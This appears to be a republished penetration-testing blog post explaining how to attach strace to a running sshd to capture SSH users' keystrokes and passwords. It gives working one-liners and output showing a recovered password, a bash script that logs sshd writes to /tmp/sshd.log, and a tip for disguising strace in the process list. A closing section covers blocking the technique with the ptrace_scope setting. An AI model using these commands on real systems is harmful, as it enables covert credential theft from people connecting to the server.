Using strace to monitor SSH connections on Linux
来源:互联网 发布:网络推广手段 编辑:程序博客网 时间:2024/06/05 06:54
Using strace to monitor SSH connections on Linux
As a penetration tester, I like to avoid replacing binaries on running systems as it makes it more difficult to clean up the system after we're done. Occasionally a tester will come across a Linux server that is used to connect to other internal systems. It would be nice to be able to monitor the SSH sessions without replacing the SSHD daemon. This is where ptrace comes in handy.
Using strace to hook into SSH
The system call ptrace is used to monitor and control another process. It's mostly used by debuggers and programs that map out what another application is doing. One of these applications is strace. Strace connects to another process and prints out all the system calls that the attached process is using. This includes the data that is being sent from a user through SSH.
The SSH client and SSH server use different system calls to read data from the user and show data on the screen. For example, you can read what the user is typing into an SSH client by connecting strace to the process and looking for read(#, "[data]", 16384) system calls. If you attach to an SSH server then you can read what the user is sending by looking for the write(#, "[data]", 1) system calls. The # symbol represents the file descriptor number that SSH is using. This can change based on a number of factors, but should be the same for each SSH process on a system.
# ps -fC sshdUID PID PPID C STIME TTY TIME CMDroot 2734 1 0 10:27 ? 00:00:00 /usr/sbin/sshdroot 13909 2734 0 14:05 ? 00:00:00 sshd: root@pts/0root 13919 2734 0 14:05 ? 00:00:00 sshd: root@pts/1# strace -p 13909 -e write 2>&1 | egrep "^write\(.*1\)"write(7, "p", 1) = 1write(7, "a", 1) = 1write(7, "s", 1) = 1write(7, "s", 1) = 1write(7, "w", 1) = 1write(7, "o", 1) = 1write(7, "r", 1) = 1write(7, "d", 1) = 1write(7, "\r", 1) = 1
We can use awk to make the output a little prettier:
# strace -p 13909 2>&1 | awk '/^write\(.*1\)/ {gsub(/\"/, "");gsub(/\,/, "");gsub(/\\r/, "\\n");sub(/[0-9]*\)/," ",$2);sub(/\\177/,"\b",$2);sub(/\\t/,"\t",$2);sub(/\\3/,"\^C",$2);printf $2}'password\n
strace -ff -e write -p sshd_PID -o /tmp/sshd.log # record sshd log (for example, password)
Automated strace SSH key logger Python proof of concept
It is possible to automate hooking into new SSH connections using strace and outputting the results to a file. Thepython code available here can do that. Due to how the python code is parsing the data it will update the log files after a certain amount of bytes are read. While this method isn't that stealthy, it is possible to use exec -a [name] to have strace appear to be a different command in ps and top.
Mitigate ptrace attacks by disabling ptrace
Linux Kernel version 3.4 and above support the ability to limit or disable ptrace altogether. This can be done by using sysctl to set kernel.yama.ptrace_scope to a 1, 2, or 3. By default most distributions set this to 1. According to the Linux Kernel Yama Documentation These numbers map to the following permissions:
0 - Allow non-child processes to ptrace a process
1 - Block non-child processes from ptrace-ing a process
2 - Only processes with CAP_SYS_PTRACE may use it or children calling PTRACE_TRACEME
3 - Disable ptrace. Requires a reboot to change
This makes it possible to disable ptrace on a system by running "sysctl kernel.yama.ptrace_scope=3". However, this may break other programs that are running. Wine, for example, does not work properly with ptrace disabled. I suggest that you test a non-production server and verify that all of its functions can run properly without ptrace enabled. Disabling ptrace also prevents some debugging features.
#!/bin/bash # Author: nixawk paul# Get sshd Process IDSSHD_pid=`ps -fC sshd | grep "sshd" | grep -v "grep" | awk -F " " '{print $2}'`if [[ -z "$SSHD_pid" ]];then echo "[-] SSH Server does not start." exit 1fi# Check permissionif [[ "$UID" -ne 0 ]];then echo "[-] Must be root to execute the script." exit 1fi# Trace sshd operations# log ssh passwordsSSHD_log="/tmp/sshd.log"if [[ -n "SSHD_log" ]];then echo "[+] create log file: $SSHD_log" : > $SSHD_log if [[ -w $SSHD_log ]];then strace -ff -e write -p $SSHD_pid 2>&1 |tee -a "$SSHD_log" fifi# Disable ptrace# sysctl kernel.yama.ptrace_scope = 0 / 1 / 2 / 3# 0 ---- Allow non-child processes to ptrace a process# 1 ---- Block non-child processes from ptrace-ing a process# 2 ---- Only processes with CAP_SYS_PTRACE may use it or children calling PTRACE_TRAMEME# 3 ---- Disable ptrace Requires a reboot to change~
Conclusion
While ptrace provides useful debugging functionality, in the wrong scenario it can cause security issues. This is why it is important to take a look at what is needed for a server to perform its function and disable any unneeded functionality and services.
Recommends:
https://www.netspi.com/DesktopModules/SunBlog/Handlers/Print.aspx?id=224
- Using strace to monitor SSH connections on Linux
- How To Monitor Remote Windows Machine Using Nagios on Linux
- How to Monitor and Log Network Traffic on Linux Using vnStat
- How to Monitor and Log Network Traffic on Linux Using vnStat
- Using Watchpoints register to monitor momery access on MIPS
- How to monitor system temperature on Linux
- Using JConsole to Monitor Applications
- Using JConsole to Monitor Applications
- 18 commands to monitor network bandwidth on Linux server
- unable to start the monitor on 4454 ,an other instance is problaly using the same port
- How to generate an SSH key on Windows using PuTTY?
- 5 simple ways to troubleshoot using Strace
- 5 simple ways to troubleshoot using Strace
- Using PGSNAP to Monitor PostgreSQL Database
- Using Putty on Windows to login Linux securely via OpenSSH
- How to Debug Java -JNI using GDB on linux ?
- Collectl is a powerful tool to monitor system resources on Linux
- using strace to follow the startup of zygote
- [Opencv源码阅读]InputArray和OutputArray
- Makefile选项CFLAGS,LDFLAGS,LIBS
- 关于win7下部署IIS
- Android: am, pm, wm
- 动态规划之三角形
- Using strace to monitor SSH connections on Linux
- linux多线程编程--对三层for循环的优化
- 精炼地写代码
- android在开启飞行模式的情况下,禁止打开蓝牙
- getopt();
- JDK内置工具的使用
- Ehcache高并发在项目中的应用
- poj 2182 树状数组(给牛排序)
- 如何写出更好的单元测试